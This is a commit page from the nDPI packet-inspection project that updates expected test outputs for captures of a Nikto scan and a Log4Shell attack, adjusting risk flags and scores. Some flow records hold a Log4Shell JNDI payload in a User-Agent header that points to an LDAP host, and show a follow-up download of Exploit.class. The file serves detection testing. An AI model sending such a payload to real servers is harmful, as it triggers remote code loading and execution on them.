aboutsummaryrefslogtreecommitdiff
path: root/tests/result
diff options
context:
space:
mode:
authorIvan Nardi <12729895+IvanNardi@users.noreply.github.com>2022-02-19 19:18:02 +0100
committerGitHub <noreply@github.com>2022-02-19 19:18:02 +0100
commitf28a3b293e8d103170155bd9137b33a5eddfd6ec (patch)
treed90cf1a74bc96a3cb9480694db5cd47b27570380 /tests/result
parenta2878af1eed26db8380bf8c29e5bb64a0181f935 (diff)
Fix compilation and sync unit tests results (#1445)
'strcasestr' is not defined in all enviroments: quicker fix is to use 'ndpi_strncasestr' instead.
Diffstat (limited to 'tests/result')
-rw-r--r--tests/result/WebattackRCE.pcap.out2
-rw-r--r--tests/result/log4j-webapp-exploit.pcap.out2
2 files changed, 2 insertions, 2 deletions
diff --git a/tests/result/WebattackRCE.pcap.out b/tests/result/WebattackRCE.pcap.out
index a8bc60e36..16a170487 100644
--- a/tests/result/WebattackRCE.pcap.out
+++ b/tests/result/WebattackRCE.pcap.out
@@ -712,7 +712,7 @@ HTTP 797 191003 797
705 TCP 127.0.0.1:50666 -> 127.0.0.1:8080 [proto: 7/HTTP][ClearText][Confidence: DPI][cat: Web/5][1 pkts/206 bytes -> 0 pkts/0 bytes][Goodput ratio: 68/0][< 1 sec][Hostname/SNI: 127.0.0.1][URL: 127.0.0.1/smssend.php][StatusCode: 0][User-Agent: Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:001166)][Risk: ** Known Protocol on Non Standard Port **** HTTP Numeric IP Address **][Risk Score: 60][PLAIN TEXT (bGET /smssend.php HTTP/1.1)][Plen Bins: 0,0,0,0,100,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
706 TCP 127.0.0.1:51074 -> 127.0.0.1:8080 [proto: 7/HTTP][ClearText][Confidence: DPI][cat: Web/5][1 pkts/206 bytes -> 0 pkts/0 bytes][Goodput ratio: 68/0][< 1 sec][Hostname/SNI: 127.0.0.1][URL: 127.0.0.1/fx29id1.txt][StatusCode: 0][User-Agent: Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006449)][Risk: ** Known Protocol on Non Standard Port **** HTTP Numeric IP Address **][Risk Score: 60][PLAIN TEXT (GET /fx)][Plen Bins: 0,0,0,0,100,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
707 TCP 127.0.0.1:51076 -> 127.0.0.1:8080 [proto: 7/HTTP][ClearText][Confidence: DPI][cat: Web/5][1 pkts/206 bytes -> 0 pkts/0 bytes][Goodput ratio: 68/0][< 1 sec][Hostname/SNI: 127.0.0.1][URL: 127.0.0.1/fx29id2.txt][StatusCode: 0][User-Agent: Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006450)][Risk: ** Known Protocol on Non Standard Port **** HTTP Numeric IP Address **][Risk Score: 60][PLAIN TEXT (GET /fx)][Plen Bins: 0,0,0,0,100,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
- 708 TCP 127.0.0.1:49648 -> 127.0.0.1:8080 [proto: 7/HTTP][ClearText][Confidence: DPI][cat: Web/5][1 pkts/205 bytes -> 0 pkts/0 bytes][Goodput ratio: 67/0][< 1 sec][Hostname/SNI: 127.0.0.1][URL: 127.0.0.1/robots.txt][StatusCode: 0][User-Agent: Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:robots)][Risk: ** Known Protocol on Non Standard Port **** HTTP Numeric IP Address **][Risk Score: 60][PLAIN TEXT (GET /robots.t)][Plen Bins: 0,0,0,0,100,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
+ 708 TCP 127.0.0.1:49648 -> 127.0.0.1:8080 [proto: 7/HTTP][ClearText][Confidence: DPI][cat: Web/5][1 pkts/205 bytes -> 0 pkts/0 bytes][Goodput ratio: 67/0][< 1 sec][Hostname/SNI: 127.0.0.1][URL: 127.0.0.1/robots.txt][StatusCode: 0][User-Agent: Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:robots)][Risk: ** Known Protocol on Non Standard Port **** HTTP Numeric IP Address **** Crawler/Bot Detected **][Risk Score: 70][PLAIN TEXT (GET /robots.t)][Plen Bins: 0,0,0,0,100,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
709 TCP 127.0.0.1:49662 -> 127.0.0.1:8080 [proto: 7/HTTP][ClearText][Confidence: DPI][cat: Web/5][1 pkts/205 bytes -> 0 pkts/0 bytes][Goodput ratio: 67/0][< 1 sec][Hostname/SNI: 127.0.0.1][URL: 127.0.0.1/][StatusCode: 0][User-Agent: Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:parked detection)][Risk: ** Known Protocol on Non Standard Port **** HTTP Numeric IP Address **][Risk Score: 60][PLAIN TEXT (GET / HTTP/1.1)][Plen Bins: 0,0,0,0,100,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
710 TCP 127.0.0.1:49846 -> 127.0.0.1:8080 [proto: 7/HTTP][ClearText][Confidence: DPI][cat: Web/5][1 pkts/205 bytes -> 0 pkts/0 bytes][Goodput ratio: 67/0][< 1 sec][Hostname/SNI: 127.0.0.1][URL: 127.0.0.1/127.pem][StatusCode: 0][User-Agent: Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:sitefiles)][Risk: ** Known Protocol on Non Standard Port **** HTTP Numeric IP Address **][Risk Score: 60][PLAIN TEXT (GET /127.pem HTTP/1.1)][Plen Bins: 0,0,0,0,100,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
711 TCP 127.0.0.1:49848 -> 127.0.0.1:8080 [proto: 7/HTTP][ClearText][Confidence: DPI][cat: Web/5][1 pkts/205 bytes -> 0 pkts/0 bytes][Goodput ratio: 67/0][< 1 sec][Hostname/SNI: 127.0.0.1][URL: 127.0.0.1/127.pem][StatusCode: 0][User-Agent: Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:sitefiles)][Risk: ** Known Protocol on Non Standard Port **** HTTP Numeric IP Address **][Risk Score: 60][PLAIN TEXT (GET /127.pem HTTP/1.1)][Plen Bins: 0,0,0,0,100,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
diff --git a/tests/result/log4j-webapp-exploit.pcap.out b/tests/result/log4j-webapp-exploit.pcap.out
index 31f54ba0e..e60f8197f 100644
--- a/tests/result/log4j-webapp-exploit.pcap.out
+++ b/tests/result/log4j-webapp-exploit.pcap.out
@@ -10,7 +10,7 @@ LDAP 32 2796 2
1 TCP 172.16.238.10:48534 <-> 172.16.238.11:80 [proto: 7/HTTP][ClearText][Confidence: DPI][cat: Download/7][7 pkts/692 bytes <-> 6 pkts/1964 bytes][Goodput ratio: 30/79][0.00 sec][Hostname/SNI: 172.16.238.11][bytes ratio: -0.479 (Download)][IAT c2s/s2c min/avg/max/stddev: 0/0 0/0 1/1 0/0][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 99/327 276/1420 72/494][URL: 172.16.238.11/Exploit.class][StatusCode: 200][Content-Type: application/java-vm][User-Agent: Java/1.8.0_51][Risk: ** Binary Application Transfer **** HTTP Numeric IP Address **** Possible Exploit Detected **][Risk Score: 510][PLAIN TEXT (GET /Exploit.class HTTP/1.1)][Plen Bins: 0,0,0,0,0,0,66,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,33,0,0,0,0,0]
2 TCP 172.16.238.10:48444 <-> 172.16.238.11:80 [proto: 7/HTTP][ClearText][Confidence: DPI][cat: Download/7][6 pkts/624 bytes <-> 6 pkts/1964 bytes][Goodput ratio: 33/79][0.01 sec][Hostname/SNI: 172.16.238.11][bytes ratio: -0.518 (Download)][IAT c2s/s2c min/avg/max/stddev: 0/0 1/2 3/3 1/1][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 104/327 276/1420 77/494][URL: 172.16.238.11/Exploit.class][StatusCode: 200][Content-Type: application/java-vm][User-Agent: Java/1.8.0_51][Risk: ** Binary Application Transfer **** HTTP Numeric IP Address **** Possible Exploit Detected **][Risk Score: 510][PLAIN TEXT (GGET /Exploit.class HTTP/1.1)][Plen Bins: 0,0,0,0,0,0,66,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,33,0,0,0,0,0]
- 3 TCP 172.16.238.1:1984 <-> 172.16.238.10:8080 [proto: 7/HTTP][ClearText][Confidence: DPI][cat: Web/5][5 pkts/994 bytes <-> 4 pkts/503 bytes][Goodput ratio: 65/44][19.29 sec][Hostname/SNI: 192.168.13.31][bytes ratio: 0.328 (Upload)][IAT c2s/s2c min/avg/max/stddev: 1/7 4822/6428 10256/10256 4838/4568][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 199/126 714/291 258/95][URL: 192.168.13.31:8080/log4shell/login][StatusCode: 200][Req Content-Type: application/x-www-form-urlencoded][Content-Type: text/html][User-Agent: jndi:ldap://172.16.238.11:1389/a][Risk: ** Known Protocol on Non Standard Port **** HTTP Suspicious User-Agent **** HTTP Numeric IP Address **** Possible Exploit Detected **][Risk Score: 410][PLAIN TEXT (POST /log)][Plen Bins: 0,0,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
+ 3 TCP 172.16.238.1:1984 <-> 172.16.238.10:8080 [proto: 7/HTTP][ClearText][Confidence: DPI][cat: Web/5][5 pkts/994 bytes <-> 4 pkts/503 bytes][Goodput ratio: 65/44][19.29 sec][Hostname/SNI: 192.168.13.31][bytes ratio: 0.328 (Upload)][IAT c2s/s2c min/avg/max/stddev: 1/7 4822/6428 10256/10256 4838/4568][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 199/126 714/291 258/95][URL: 192.168.13.31:8080/log4shell/login][StatusCode: 200][Req Content-Type: application/x-www-form-urlencoded][Content-Type: text/html][User-Agent: jndi:ldap://172.16.238.11:1389/a][Risk: ** Known Protocol on Non Standard Port **** HTTP Numeric IP Address **** Possible Exploit Detected **][Risk Score: 310][PLAIN TEXT (POST /log)][Plen Bins: 0,0,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
4 TCP 172.16.238.10:57650 <-> 172.16.238.11:1389 [proto: 112/LDAP][ClearText][Confidence: DPI][cat: System/18][9 pkts/739 bytes <-> 8 pkts/727 bytes][Goodput ratio: 16/24][17.91 sec][bytes ratio: 0.008 (Mixed)][IAT c2s/s2c min/avg/max/stddev: 0/5 2545/3580 17700/17700 6187/7060][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 82/91 137/215 22/47][Risk: ** Known Protocol on Non Standard Port **][Risk Score: 50][PLAIN TEXT (objectClass)][Plen Bins: 51,16,16,0,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
5 TCP 172.16.238.10:57742 <-> 172.16.238.11:1389 [proto: 112/LDAP][ClearText][Confidence: DPI][cat: System/18][9 pkts/739 bytes <-> 6 pkts/591 bytes][Goodput ratio: 16/30][0.02 sec][bytes ratio: 0.111 (Mixed)][IAT c2s/s2c min/avg/max/stddev: 0/0 2/1 11/2 4/1][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 82/98 137/215 22/52][Risk: ** Known Protocol on Non Standard Port **][Risk Score: 50][PLAIN TEXT (objectClass)][Plen Bins: 51,16,16,0,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
Powered by cgit, Themed by Ted Yin.